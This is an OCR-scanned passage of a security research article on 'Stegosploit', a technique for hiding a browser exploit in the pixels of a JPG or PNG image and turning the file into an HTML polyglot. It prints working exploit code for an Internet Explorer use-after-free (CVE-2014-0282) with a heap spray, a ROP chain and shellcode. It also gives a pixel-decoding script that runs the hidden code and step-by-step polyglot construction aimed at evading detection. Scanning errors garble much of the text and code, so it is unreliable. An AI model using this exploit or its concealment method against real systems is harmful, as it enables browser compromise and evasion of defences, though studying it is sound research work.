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code for this exploit is shown in Figure 11, while 
the same exploit can be compressed into the fohow- 
ing PNG image. 




In 2014, Sucuri reported a browser exploit cam- 
paign that used the now dubbed "255 shades of gray" 
exploit dehvery technique employing the same CAN- 
VAS PNG decoder Javascript that I had demon- 
strated in 2010.^^ 

Since 2010, I have been working on several tech- 
niques for sophisticated exploit dehvery using im- 
ages. The results of my research have led to the 
Stegosploit toolset, which I shall use to demonstrate 
dehvering and triggering an exploit for the Inter- 
net Explorer Clnput Use-After-Free vulnerabihty 
(CVE-2014-0228) using a single image?'^ 

My motivation for image-based exploit dehvery 
is simple. I want to study the effectiveness of image- 
based exploit dehvery, explore ramifications on ex- 
ploit detection, and evolve new mitigation tech- 
niques to combat future threats. However, my main 
motivation stih remains dehvering exploits in style, 
and combining them with my photography!^^ 

What foUows is a detailed discussion on creating 
and dehvering steganographicahy encoded exploits 
using nothing but a single image. We shah take a 
known Internet Explorer Use-After-Free vulnerabil- 
ity (CVE-2014-0282), which is currently dehvered 
using HTML and Javascript, and turn it into an ex- 
ploit that can be dehvered via a single image. 



Section 7.2 introduces CVE-2014-0282, provides 
a quick tour of the Stegosploit Toolkit, and explains 
the process of steganographicahy encoding the ex- 
ploit code into JPG and PNG images. 

Section 7.3 deals with decoding the encoded im- 
age using Javascript in the victim's browser. 

Section 7.4 introduces HTML+Image polyglots, 
necessary for packing the decoder and steganograph- 
icahy encoded exploit into a single container. 

Section 7.5 talks about some of the finer points of 
HTTP transport when it comes to exploit dehvery. 



7.2 CVE-2014-0282 Case Study 

Stegosploit is a portmanteau of Steganography and 
Exploit. Using Stegosploit, it is possible to trans- 
form virtuahy any Javascript-based browser exploit 
into a JPG or PNG image. 

We shah start with a minified Javascript version 
of the exploit code, tested on Internet Explorer 9 
running on Windows 7 SPl. Exploit code for CVE- 
2014-0282 is shown in Figure 12. 

The exploit performs a heap spray using HTML5 
CANVAS-based on a technique first discussed at 
EUSecWest 2012 by Federico Muttis and Anibal 
Sacco,^^ and code borrowed from Peter Hlavaty's 
HTML5 Heap Spray code h5spray.^^ 

The exploit sprays a simple VirtualProtect ROP 
chain and Windows command execution shehcode 
to launch calc.exe upon successfuhy triggering the 
lE Clnput Use-After-Free vulnerabihty.^^ 

To dehver this exploit in style, and also for vari- 
ous practical reasons, let's obey five restrictions. (1) 
No data to be transmitted over the network except 
JPG or PNG files. (2) The image displayed in the 
browser should have no visible aberration or dis- 
tortion. (3) No exploit code should be present as 
strings within the image file. (4) The image should 
decode the exploit code upon being loaded in the 
browser without any external user interaction. (5) 
Only ONE image shah be used for this exploit. 

We shah begin with a JPG image of Kevin Mc- 
Peake, who volunteered to have this exploit painted 
on his face for a demonstration at Hack In The Box 
Amsterdam 2015. 



■^^https : //blog. sucuri .net /20 14/02/new- iframe-injectioiis-leverage-piig-image-metadata.html 
^^https : //www . exploit-db . com/exploits/33860/ 
^•^http : //www. spectral-lines . in/ 

^^http : //www. coresecurity . com/corelabs-research/publications/html5-heap-sprays-pwn-all-things 

^^http : //www . zerOmem . sk/?p=5 

^^https : //www . exploit-db . com/exploits/33860/ 



29 



function H5 ( ) { t his . d = [] ; t his .n^new Array ( ) ; t his . f=new Array ( ) }H5 . prot otype . f 1 a t 
ten=funct ion () {for(var f=0;f<this .d. length ; f ++){ var n=t his .d[f];if(typeof ( n)=' 
number ' ) { var c=n . toString (16) ; while(c . length <8){c='0 '+c}var l=function (a){retur 
n( parselnt (c . substr (a ,2) ,16) ) }; var g=l (6) ,h=l (4) ,k=l (2) ,n^l (0) ; this . f . push(g) ; t 
his . f.push(h) ; this . f.push(k) ; this . f.push (m) } if (typeof (n)^=' string '){for(var d=0 
; d<n . length ; d++){ this . f.push(n. charCodeAt (d) ) } } } } ;H5 .prototype. fill=function(a) 
{for ( var c = 0,b = 0;c<a. data . length ; c++,b++){ i f (b>=8192) {b=0}a . dat a [ c ] = (b<t h is . f . 1 
ength)?this . f[b]:255}}; H5 . prototype . spray=f unct ion (d){this . flatten () ;for(var b= 
0 ; b<d ; b++){ var c=document .createElement( 'canvas ') ;c.width = 131072;c. height=l;var 

a=c .getContext( '2d') .createImageData(c. width ,c. height) ; this . fill (a) ; this .m[b] = 
a} } ;H5 . prototype . setData=function (a) { t his . d=a} ; var f 1 ag=f a 1 s e ; var heap=new H5() 
; try { location . href= 'ms— help : ' } catch ( e ) {} f unct ion spray(){var a= ' \ xfc \xe8 \x89\x0 
0\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\xl4\x8b\x72\x 
28\x0f\xb7\x4a\x26\x31\xff \x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xcl\xcf\x0d\x01\ 
Xc7\xe2\xf0\x52\x57\x8b\x52\xl0\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a 
\x01\xd0\x50\x8b\x48\xl8\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x3 
l\xff \x31\xc0\xac\xcl\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x 
75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\xlc\x01\xd3\x8b\x04\x8b\ 
X01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff \xe0\x58\x5f\x5a\x8b\xl2\xeb 
\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff \xd5\xbb\xf 
0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff \xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\x 
bb\x47\xl3\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00 ' ; var 

c = [] ; for ( var b = 0;b< 1104;b+=4){c . push (1371756628) }c . push (1371756627) ; c . push(137 
1351263) ; var f = [1 371 756626 , 2 1 5 , 2 147353344 , 1 371 367674 , 202 1 22408 ,4294967295 , 202 1 2 
2400, 202122404, 64, 202116108, 202121248, 16384] ;var d=c . concat ( f ) ;d. push(a) ; heap . s 
etData (d) ; heap . spray (256) } funct ion changer ( ) { var c=new Array ( ) ; for ( var a = 0;a<10 
0 ; a++){ c . push ( document . createElement ( ' img '))}if(flag) {document .getElementById( ' 
fm') .innerHTML=' ' ; Collect Garbage ( ) ; var b= ' \ u2020 \ uOcOc ' ;for(var a = 4;a<110;a+=2) 
{b+=' \u4242 ' }for ( var a = 0;a<c . length ; a++){c [a]. title=b}}}function run () {spray () ; 
document . getElementByld ( ' c2 ' ) . checked=true ; document . getElementByld ( ' c2 ' ) . onprop 
ertychange=changer ; flag=true ; document . getElementByld ( 'fm') . reset ()}setTimeout(r 
un,1000) ; 



Figure 12: Exploit for CVE-2014-0282, to be decoded by Figure 13. 
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7.2.1 Encoding the Exploit Code 



Steganography is a well established science. There 
are several steganography algorithms that not only 
avoid visual detection but also provide error correc- 
tion and the abihty to survive basic image transfor- 
mation. Popular algorithms such as F5^^ have been 
implemented in Javascript.^^ However, we wiU use 
very basic steganography to keep the decoder code 
compact and simple. 

An image is essentiaUy an array of pixels. Each 
pixel can have three channels: Red, Green, and 
Blue. Each channel is represented by an 8-bit value, 
which provides 256 discrete levels of color. Some 
images also have a fourth channel, caUed the alpha 
channel, which is used for pixel transparency. We 
shaU restrict ourselves to using only the R, G, and 
B channels. A black and white image uses the same 
values for R, G, and B channels for each pixel. 

Let us, for simphcity's sake, consider black and 
white images to start with. Keeping in mind 8-bit 
grayscale values, we can visuahze an image to be 
composed of 8 separate bit layers. Bit layer 0 is an 
image formed by values of the least significant bit 
(LSB) of the pixels. Bit layer 1 is formed by values 
of the second least significant pixel bit. Bit layer 7 is 
formed by values of the most significant bit (MSB) 
of aU the pixels. 



Kevin's image can be decomposed into 8-bit lay- 
ers as shown in the foUowing images. 




^http : //f 5-steganography .googlecode . com/f iles, 
'https : //github . com/desudesutalk/ j s- jpeg-steg 




Note that the images are equahzed to show the 
presence and absence of pixel bits. Bit layer 7 con- 
tributes the maximum information to the image. It 
is akin to the broad outhnes of a painting. As we 
step down through the bit layers, the information 
contributed to the image decreases, but the level of 
detail increases. Bit layer 0 in isolation looks hke 
noise and contributes to the finer shade variations 
in the overaU image. 

Think of the bit layers as transparent sheets. 
When they are superimposed together, they wiU re- 
sult in the complete image. The exploit code shaU 
be written on one of these transparent sheets. First, 
the exploit code is converted to a bit stream. Each 
bit from the exploit bit stream is written onto the 
bit in the image's bit layer. The bit layers are then 
superimposed together to create an image, one that 
contains the exploit code encoded in its pixels. En- 
coding the exploit bit stream on higher bit layers 
wiU result in significant visual distortion of the re- 
sultant image. The goal is to encode the exploit bit 
stream into lower bit layers, preferably bit layer 0 
which comprises of the LSB of aU the pixels. 

For comparison, here are two resultant images, 
with the exploit bit stream encoded on bit layer 7 
versus bit layer 2. The pixel encoding is exagger- 
ated using red pixels for l's and black pixels for O's 
encoded in a 3 x 3 grid. 

;anography . pdf 
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The resultant image, when the bitstream is en- 
coded on bit layer 2, shows httle or no visual aber- 
ration, even close up. 

JPG images are compressed using a discrete co- 
sine transform (DCT) based lossy compression algo- 
rithm. A pixel may be approximated to its nearest 
neighbor for better compression at the cost of image 
entropy and detail. The resultant visual degradation 
would be neghgible, but the loss of pixel data intro- 
duces significant errors in steganographic message 
recovery. To overcome pixel loss of JPG encoding, 
we shah use an iterative encoding technique, which 
shah result in an error-free decoding of the encoded 
bit stream. 

"Exploring JPEG" is an aptly named article that 
provides detailed explanation of how JPG files com- 
press image data.^^ 

7.2.2 Iterative Encoding for JPG Images 

JPG encoders can use variable quahty settings. Low 
quahty offers maximum compression. However, the 
maximum quahty level does not provide us with loss- 

^^https: / /www. imperialviolet.org/binary/jpeg/ 



less compression. Certain pixels wih stih be approx- 
imated no matter what, even if we use the highest 
possible encoding quahty level. To further minimize 
pixel approximation, we shah not encode the ex- 
ploit bit stream on consecutive pixels, but rather in 
a pixel grid with every nth pixel in rows and columns 
being used for encoding the bit stream. Pixel grids 
of 3 X 3 and 4x4 perform much better compared to 
encoding on every consecutive pixel. Increased pixel 
grid dimensions do not make for lower errors. 

The encoding process can be represented as fol- 
lows. 

• Let / be the source image. 

• Let M be the message to be encoded on a given 
bit layer of image /. 

• Let ENCODE be the steganographic encoder 
function, and let DECODE be the stegano- 
graphic decoder function. 

• Let h be the number of the bit layer (0-7). 

• Let J be the JPG encoder function. 

By encoding message M onto image /, we shah 
obtain resultant image /', as fohows: 

I' = J{ENCODE{I, M, b)) 

Upon decoding image /', we shah obtain a resul- 
tant message M', as fohows: 

M' = DECODE{I\b) 

For JPG images, M' is not equal to M. Let A 
be the error between the original and resultant mes- 
sage. 

A = M - M' 

Our goal is to get A = 0. If we re-encode the 
original message M on resultant image /', we shah 
obtain a new image 1": 

I" = J{ENCODE{I', M, b)) 
Decoding I" wih result in message M" as fohows: 

M" = DECODE{I",b) 
A' = M - M" 
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If < A, then we can assume that the encod- 
ing process shaU converge, and after N iterations, we 
will get an error-free decoded message and A = 0. 

Note: since the encoding and decoding processes 
operate on discrete pixels, certain situations result 
in non-convergence with neighboring pixels fiipping 
alternately hke Conway's Game of Life.The number 
of passes required for convergence depends upon the 
encoder used in the JPG processor hbrary. 

Stegosploit's iterative encoder tool iterative_- 
encoder.html uses the browser's built in JPG pro- 
cessor hbrary via HTML5 CANVAS. Ah stegano- 
graphic encoding is performed in-browser using 
CANVAS. Browsers use different JPG processor 
hbraries. A steganographicaUy generated JPG 
from Firefox will not accurately decode in Inter- 
net Explorer, and vice versa. A future goal is 
to achieve cross-browser JPG steganography com- 
patibility. For now, PNG provides cross-browser 
steganography compatibihty because it employs 
lossless compression. Therefore, for CVE-2014- 
0282, we shaU use IE9 to perform the steganographic 
encoding. 

7.2.3 A Few Notes on Encoding on JPG us- 
ing CANVAS 

AU Stegosploit tools use HTML5 CANVAS for im- 
age analysis, encoding, and decoding. Here are some 
of the finer points to be kept in mind for using or 
extending the tools. 

Note: These observations are based on encoding 
that involved messages averaging 2500 bytes in size, 
the average size of a typical minified and compacted 
browser exploit. 

iterative_encoding.html generates JPG 
images using the toDataURL("image/jpeg" , 
quality). The quality parameter is a value be- 
tween 0 and 1. As mentioned earlier, a value of 
1 does not imply lossless encoding. By default, 
iterative_encoding.html keeps the quahty value 
as 1. Reducing the quality value increases the pixel 
deviation with each encoding round, prolonging 
the convergence, and in some cases not leading to 
convergence at all. The quality of encoding also de- 
pends upon whether the encoder uses software-only 
encoding or hardware assisted encoding. Float- 
ing point precision, make and model of GPU, and 
JPG libraries across different platforms contribute 
to minor errors when encoding and decoding across 

^^Stack Overflow, "Strange issue with Canvas in Internet E 
text?" 



browsers. 

I have found that encoding at bit layer 0 and 1 
usually never results into convergence when it comes 
to JPG. My tests were performed with IE9 and Fire- 
fox 21. Bit layers 2 and 3 have shown more success 
when it comes to encoding, especiaUy on lE. Bit 
layer 5 and above result in noticeable visual aberra- 
tion of the encoded image. 

A pixel grid of 3 x 3 is preferred for the encod- 
ing process. This implies 1 bit for every 9 pixels in 
the image. Higher pixel grids yield faster conver- 
gence and less visual degradation. The JPG DCT 
algorithm encodes 8x8 pixel squares at a time. It 
doesn't make sense to use a pixel grid larger than 
8x8. 

I encountered unusual errors when encoding 
larger images. The pixel array of the CANVAS ap- 
peared to be truncated beyond a certain dimension. 
For example, encoding was successful on 1024x768 
pixel images, but completely fell apart on 1280x850 
pixel images. While I have not tested the operating 
limit in terms of dimensions, a discussion on Stack 
Overflow^'' seems to indicate that lE might limit 
CANVAS memory to 20MB. 

Color images can be thought of as composite im- 
ages derived from three channels: Red, Green, and 
Blue. Each image can therefore be visuahzed as be- 
ing decomposed into three channels, and each chan- 
nel is further decomposed into 8-bit layers. We can 
choose to encode on any one of the 24 image layers. 

Firefox's JPG encoder outperforms lE's JPG en- 
coder when it comes to color images. lE's JPG en- 
coder does not usually converge when encoding at 
bit layers below 3. 

Stegosploit's encoding process only affects the 
pixel data stored with the JPG file. AU other meta- 
data including EXIF tags do not affect the encod- 
ing/decoding process. Encoded images generated 
from iterative_encoding.html do not retain any 
metadata present in the original image. This is be- 
cause toDataURI ( " image/ jpeg" ) generates entirely 
new JPG data. It is possible to copy the original 
JPG metadata back onto the encoded image using 
EXIF manipulation tools such as exif tool. 

$ exiftool — tagsFromFile source.JPG \ 
2 -alliall encoded.JPG 



Certain apphcations check for validity of images 
[orer 9, is there any constraint of width and size of canvas/con- 
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using metadata. Metadata adds more "legitimacy" 
to the steganographically encoded image. 

7.2.4 Encoding for PNG images 

PNG images store pixel data using lossless compres- 
sion. There is no approximation of pixels, and there- 
fore there is no loss of quahty. HTML5 CANVAS 
has the abihty to generate PNG images using the 
toDataURI ("image/png") method. 

iterative_encoding.html has the abihty to 
auto-detect the source image type, based on its ex- 
tension, and use the appropriate encoding process. 

Encoding on PNG images has several advantages 
over JPG: 

The encoding process completes in a single pass. 
Encoding is possible at the lower layer, as the LSB, 
so no visual aberrations occur in the resulting im- 
age. Cross-browser decoding works accurately, and 
it is possible to encode in the alpha channel!^^ 

7.3 Decoding the Exploit 

A steganographicahy encoded exploit is performed 
in roughly the fohowing six steps. 

(1) Load the HTML containing the decoder 
Javascript in the browser. 

(2) The decoder HTML loads the image carrying 
the steganographicahy encoded exploit code. 

(3) The decoder Javascript creates a new canvas 
element. 

(4) Pixel data from the image is loaded into the 
canvas, and the parent image is destroyed from the 
DOM. From here onwards, the visible image is from 
the pixels in the canvas element. 

(5) The decoder script reconstructs the exploit 
code bitstream from the pixel values in the encoded 
bit layer. 

(6) The exploit code is reassembled into 
Javascript code from the decoded bitstream. 

(7) The exploit code is then executed as 
Javascript. If the browser is vulnerable, it wih be 
compromised. 

7.3.1 Decoder for CVE-2014-0282 

By and large the function of decoding the stegano- 
graphicahy encoded exploit remains the same, but 
certain browser exploits need some extra support, by 



pre-populating certain elements in the DOM. CVE- 
2014-0282 is one such exploit that requires elements 
hke <f orm>, <textarea>, <input> to be present in 
the DOM before triggering the Use-After-Free via 
Javascript. 

The HTML code containing the decoder script 
and other DOM elements required by CVE-2014- 
0282 is shown below in Figure 13. 

The HTML code is packed as tightly as possi- 
ble. There are several important factors to be noted, 
each serving a specific purpose. 

If IE9 does not detect the < ! DOCTYPE html> dec- 
laration at the beginning of the HTML document, it 
switches over to Quirks Mode instead of Standards 
Mode. Without Standards Mode, canvas does not 
work, and our entire decoder process grinds to a 
halt. 

Fortunately, lE can be switched over to Stan- 
dards Mode using the X-UA-Compatible header as 
fohows:^^ 



<headXmeta http— equiv="X— UA— Compatible " 
cont ent=" IE=Edge "> 



The decoder script in Figure 13 performs the in- 
verse function of the encoder. The script requires 
three global variables that are hardcoded in the first 
hne: 

bL Bit Layer. It has to match the bit layer used 
for encoding the bitstream. 

eC Encoding Channel. 0 = Red, 1 = Green, 2 = 
Blue, 3 = Ah Channels (grayscale) 

gr Pixel Grid. Here 3 implies a 3x3 pixel grid, 
the same grid used in the encoding process. 

The script ends by invoking the function excO 
with the reconstructed exploit Javascript string. 

The most obvious way of executing Javascript 
code represented as a string would be to use the 
evalO function. evalO, however, gets flagged as 
potentiahy dangerous code. 

Another way of executing Javascript code from 
strings is to create a new anonymous Function ob- 
ject, with the Javascript string supphed as an ar- 
gument to its constructor. The resultant Function 
object can then be invoked to the same effect as 
evalOing the string. 



^^Note that iterative_eiicodiiig.html doesn't support this yet. 

^^https : //msdn.microsoft . com/en-us/library/j j676915y«28v=vs . 85y«29 . aspx 
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1 function exc(b){var a=setTimeout ( ( new 

Function(b)) ,100) }window . onload=iO ; 

</scr ipt > 



Hat tip to Dr. Mario Heiderich for first discover- 
ing this technique. 

When delivering exploits in style, the rendered 
view has to appear neat and clean. Extra DOM el- 
ements required for the Use-After-Free bug should 
not clutter the display. An extra <style> tag in- 
serted into the HTML ahows us to selectively display 
only the image, and hide everything else by default. 

<sty le >body { visibility ihidden;} .s{ 

visibility : visible ; position : absolute ;top 
:15p 

2 x; left :10px;}</style ></head> 



The above CSS style sets the contents of body as 
hidden. Only elements with style class s wiU be dis- 
played. The foUowing DOM elements required for 
the Use-After-Free are aU hidden from view: 

<bodyXform id=fmXtext area id=c value=al></ 
t ext area Xinput id=c2 type=checkbox 
2 name=o2 value=" a2 ">Test check<BrXtext area 
id=c3 value=" a2 "></text area Xinput 
type=text name=t 1 ></form> 



Only the image is visible, since it is wrapped 
within a <div> tag with CSS class s applied to it. 
Note the source of the image is set to #, which re- 
sults into the current document URL. We shaU see 
the usefulness of this trick when we discuss polyglot 
documents in a later section. 

1 <div class=sXimg id=px sr c="#"></div> 
</body></html> 



7.3.2 Exploit Delivery - Take 1 

At this stage, we have the components necessary to 
deUver the exploit: (1) the HTML page containing 
the decoder and (2) the exploit code steganograph- 
ically encoded in a JPG file. 

Individual inspection of the above two compo- 
nents would reveal nothing suspicious. The decoder 

^•^http : / / conf erence . hitb . org/hitbsecconf 2015ains/ sessi^ 
^^http : //www . slideshare . net/saumilshah/deadly-pixels-: 



Javascript contains no potentially offensive content. 
Its code simply manipulates canvas pixels and ar- 
rays. 

The encoded JPG file also carries no offensive 
strings. All the exploit code— the shellcode, the 
ROP chain, the Use-After-Free trigger— is now em- 
bedded as bits in pixels. 

Earlier versions of Stegosploit, like the one 
demonstrated at SyScan 2015 Singapore used these 
two separate components to deliver the exploit. 

The current version of Stegosploit— vO.2, demon- 
strated at HITB 2015 Amsterdam— combines the de- 
coder HTML and the steganographically encoded 
image into a single container.^^ If opened in an im- 
age viewer, the contents show a perfectly vaUd JPG 
image. If loaded into a browser, the contents ren- 
der as an HTML document, invoking the decoder 
code and triggering the exploit, while still showing 
the image (itself) in the browserl 

This is a polyglot document. For a detailed dis- 
cussion on polyglots, please read up the exceUent 
write-up by Ange Albertini in PoC||GTFO 7:6. 

7.4 HTML+Image = Polyglot 

The final product of Stegosploit is a single JPG im- 
age that wiU trigger the CVE-2014-0282 Use-After- 
Free vulnerability in lE, when loaded in the browser. 
Before we get to the mechanics of HTML+JPG 
polyglots, we shaU take a look at the origins of 
browser-based polyglots. 

7.4.1 IMAJS - Early Work 

I first started exploring browser-based polyglots in 
2012, trying to combine data formats that are loaded 
and parsed by browsers. The end result was IMAJS, 
a successful polyglot of a GIF image and Javascript. 
The IMAJS technique could also be applied on BMP 
files. I presented IMAJS polyglots in my talk titled 
"Deadly Pixels" at NoSuchCon 2013.^^ 

GIF files always begin with the magic marker 
GIF89a. The idea here is to create a valid GIF im- 
age that contains Javascript appended at its end. 

When interpreting it as Javascript, it should 
translate to a variable assignment such as GIF89a 
= "stegosploit" ; . However, when rendering it as 
an image, it should generate a proper image. 

The first ten bytes of every GIF file are as fol- 
lows, where HH HH and WW WW are 16-bit values. 

;/ stegosploit-hacking-with-pictures/ 
:-2013 
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47 


49 


46 


38 39 61 


HH HH 


WW\AW 


G 


I 


F 


8 9 a 


height 


width 



If we set the height to 0x2 A2F, it translates to /*, 
which is a Javascript comment. The width could be 
anything. Most browsers, honouring Postel's Law, 
will still render a proper image. 

The foUowing is an example of an IMAJS GIF 
file (GIF+JS), which will pop up a Javascript alert 
if loaded in a <script> tag: 



GIF89a/* 


. . . . ( GIF image data) 


. . . V-" 


pwned " 


alert (Date() ) ; 





IMAJS BMP (BMP+JS) is also similar. 
BMP Header: 



42 4D XX XX XX XX 00 00 00 00 

B M Filesize Empty Empty DIB data 



The file size is now set to 2F 2A XX XX. At the 
end of the BMP data, we append our Javascript 
code. Even though the file size is inaccurate, ah 
browsers properly render the image. 



BM/* (BMP image data ) . . 


• • • */~"pwned" ; 


alert (Date () ) ; 





Polyglot maestro Ange Albertini has some more 
examples on Corkami.^^ 

IMAJS GIF or IMAJS BMP could be used to 
wrap the HTML decoder script, described in Fig- 
ure 13, in an image. Exploit dehvery could there- 
fore be accomphshed using only two images: one 
image containing the decoder script, while the other 
holds the steganographicaUy encoded exploit code. 
Styhsh, but not enough. 



HTML directly when loaded and execute any em- 
bedded Javascript code along the way. If the same 
data is loaded within an <img src="#"> tag, the 
browser wih render the image in its display, as men- 
tioned earher in this article. 

Basic JPG file structure fohows the JPEG File 
Interchange Format (JFIF). JFIF files contain 
several segments, each identified by the two-byte 
marker FF xx fohowed by the segment's data. Some 
popular segment markers are hsted in the foUowing 
table. 



1 
3 
5 

7 
9 
11 
13 

15 



Marker 


Code 


Name 


FF D8 


SOI 


Start Of Image 


FF EO 


APPO 


JFIF File 


FF DB 


DQT 


Define Quantization Table 


FF CO 


SOF 


Start Of Frame 


FF C4 


DHT 


Define Huffman Table 


FF DA 


sos 


Start Of Scan 


FF D9 


EOI 


End Of Image 



Every JPG file must begin with a SOI segment, 
which is just two bytes, FF D8. The APPO segment 
immediately foUows the SOI segment. The format 
of the JFIF header is as foUows: 



typedef struct 

BYTE SOI [2] ; 
BYTE APPO [ 2 ] ; 
BYTE Length [2] ; 



JFIFHeader { 

// FF D8 



marker 
BYTE Identifier 
BYTE Version [2] ; 
BYTE Units ; 



FF EO 

Length of APPO field 
excluding APPO 

"JFIF\0" 
Major , Minor 
0 = no units 



BYTE Xdensity [2] ; 
BYTE Ydensity [2] ; 
BYTE XThumbnail; 
BYTE YThumbnail; 

; 

} JFIFHEAD; 



// 
// 



1 = pixels per inch 

2 = pixels per cm 
// Horiz Pixel Density 
// Vert Pixel Density 
// Thumb Width ( if any) 
// Thumb Height ( if any 



7.4.2 Combining HTML in JPG files 

The first step towards single image exploit deUvery 
is to corabine HTML code in the steganographicaUy 
encoded JPG file, turning it into a perfectly vaUd 
HTML file. 

Mixing HTML data in JPG has an advan- 
tage over the IMAJS techniques described in Sec- 
tion 7.4.1. The image does not need to be loaded 
via a <script> tag. The browser wiU render the 



The Stegosploit Toolkit includes a utiUty caUed 
jpegdump.c to enumerate segments in a JPG file. 
Using jpegdump on the steganographicaUy encoded 
image of Kevin McPeake shows the foUowing results: 



jpegdump kevin_encoded.jpg 

marker OxffdS SOI at offset 0 (start 
of image) 

marker OxffeO APPO at offset 2 ( 
application data section 0) 



^https : //github . com/shrz/corkami/tree/master/misc/ j spics 
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marker Oxffdb DQT at offset 20 (define 

quantization tables) 
marker Oxffdb DQT at offset 89 (define 

quantization tables) 
marker OxffcO SOFO at offset 158 (start 

of frame (baseline jpeg)) 
marker 0xffc4 DHT at offset 177 (define 

huffman t ables ) 
marker 0xffc4 DHT at offset 210 (define 

huffman tables) 
marker Oxffc4 DHT at offset 393 (define 

huffman tables) 
marker Oxffc4 DHT at offset 426 (define 

huffman tables) 
marker Oxffda SOS at offset 609 (start 

of scan) 

marker 0xffd9 EOC at offset 182952 (end of 
codestream ) 



The contents of kevin_encoded. jpg can be rep- 
resented by the diagram on the left side of Figure 14. 

The most promising location to add extra con- 
tent is the APPO segment. Increasing the two-byte 
length field of APPO gives us extra space at the end 
of the segment in which to place the HTML decoder 
data, as shown on the right side of the figure. 

Stegosploit's html_in_jpg_ie.pl utility can be 
used to combine HTML data within a JPG file. 



. / html_in_jpg_ie . pl decoder_cve_2014_0282 . 
html kevin_encoded.jpg kevin_ polyglot 



comments <-- and -->. In the above example, the 
<html> tag is placed at offset 0x0014, followed by a 
start HTML comment <! - - marker. The first block 
of random data ends with the HTML comment ter- 
minator -->. The contents of the HTML decoder 
code is written after the HTML comment termina- 
tor. At the end of the HTML decoder code, we shall 
put another start HTML comment <!-- marker to 
comment out the rest of the JPG file's data. 

There have been some extreme cases where the 
JPG file itself may contain an inadvertent HTML 
comment terminator -->. In such situations, we 
can use an illegal start-of-Javascript tag <script 
type=text/undef ined> at the end of the decoder 
code. This script tag is deliberately not termi- 
nated. The DOM renderer will ignore everything fol- 
lowing <script type=text/undef ined> for HTML 
rendering. Since the Javascript type is set to 
text/undef ined, no valid Javascript or VBScript 
interpreter will run the code contained in this open 
script tag. 

7.4.4 Combining HTML in PNG files 

Generating an HTML+PNG polyglot can be done 
using a technique similar to HTML+JPG polyglots. 
We have to inspect the PNG file structure and figure 
out a safe way for embedding HTML content in it. 



The resultant kevin_polyglot file increases in 
size, successfully embedding the HTML data in the 
slack space artificially created at the end of the 
APPO segment. In the example below, the length of 
the APPO segment increases from 18 bytes to 12092 
bytes. The HTML decoder code shown in Figure 13 
is embedded between blocks of random data in the 
APPO segment from offset 0x0014 to 0x2f 3d. 

7.4.3 HTML/JPEG Coexistance 

JPG decoders would have no problem in properly 
displaying the image contained in the HTML+JPG 
polyglot described above. Browsers, however, would 
encounter problems when trying to properly render 
HTML tags. The extra JPG data would end up pol- 
luting the DOM. If the JPG data contains symbols 
such as < or >, the browser may end up creating 
erroneous tags in the DOM, which can affect the 
execution of the decoder Javascript. 

To prevent JPG data from interfering with 
HTML, we can use a few strategically placed HTML 



7.4.5 PNG File Structure 

PNG files consist of an eight-byte PNG signature 
(89 50 4E 47 OD OA lA OA) fohowed by several 
FourCC— Four Character Code— chunks. FourCC 
chunks are used in several multimedia formats. 

Each chunk consists of four parts: Length, a 
Chunk Type, the Chunk Data, and a 32-bit CRC. 
The Length is a 32-bit unsigned integer indicat- 
ing the size of only the Chunk Data field, while 
the Chunk Type is a 32-bit FourCC code such as 
IHDR, IDAT, or lEND. The CRC is generated from 
the Chunk Type and Chunk Data, but does not in- 
clude the Length field. 

Stegosploit's pngenum.pl utility lets us explore 
chunks in a PNG file. Running it against a stegano- 
graphically encoded PNG file shows us the following 
results: 



$ pngenum.pl pinklock_encoded . png 

PNG Header : 89 50 4E 47 OD OA lA OA - OK 
IHDR 13 bytes CRC: 0xE9828D3A (computed 0 
XE9828D3A) OK 
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<htmlXheadXmeta http-equi v="X-UA-Compatible " cont ent=" IE=Edge "> 
<script>var bL = 2,eC = 3,gr =3; function iO ( ) {px . onclick=dID} funct ion dID(){var b=do 
cument . createElement ("canvas") ;px. parentNode . insertBefore (b, px) ; b . width=px . widt 
h ; b . height=px . height ; var rr^b .getContext("2d") ;m. drawlmage (px , 0 , 0 ) ; px . parentNode 
.removeChild(px) ;var f^n. getlmageData (0 ,0 ,b.width ,b. height) . data;var h = [] ,j=0,g 
= 0;var c=function (p , o , u) {n=(u*b . width+o) *4; var z=l«bL;var s = (p [ n]&z )»bL ; var q 
= (p [n+l]&z )»bL ; var a=(p [ n+2]&z )»bL ; var t=Math . round (( s+q+a) /3) ; switch(eC) {cas 
e 0 : t=s ; break ; case 1 : t=q ; break ; case 2 : t=a ; break ; } return ( S t r ing . fromCharCode ( t+4 
8) ) } ; var k=funct ion ( a) { for ( var q=0,o = 0;o<a *8 ; o++){h [q++]=c ( f , j , g) ; j+=gr ; i f ( j >=b 
. width){j =0;g+=gr }}};k(6) ; var d=parselnt (bTS(h. join (""))) ;k(d) ; try { Collect Garba 
ge 0 }catch (e) {}exc (bTS(h. j oin ("")))} function bTS(b) {var a=" " ; for ( i =0;i<b. length 
; i -h=8)a-h=S t r ing . fromCharCode (parselnt (b. substr (i ,8) ,2) ) ; return (a)}function exc( 
b){var a=setTimeout ( ( new Function(b)) , 100) }window . onload=iO ; </ script > 
<st y le >body { visibility : hidden;} . s{visibility : visible ; position : absolute ;top:15p 
x; left :10px;}</style ></head> 

<bodyXform id=fmXtext area id=c value=al></textareaXinput id=c2 type=checkbox 

name=o2 value=" a2 ">Test check<BrXtext area id=c3 value="a2 "></textareaXinput 
type=text name=t 1 ></form> 
<div class=sXimg id=px sr c="#"></div> 
</body></html> 



Figure 13: Decoder Script and DOM Elements to exploit CVE-2014-0282 
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Figure 14: Structure of a JPEG (left) and JPEG+HTML (right). 
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Figure 15: PNG Structure (left) and PNG+HTML Structure (right). 
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Figure 16: JPEG Dump of a Polyglot 
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IDAT 8192 bytes CHC: OxEDBlABBS (computed 0 

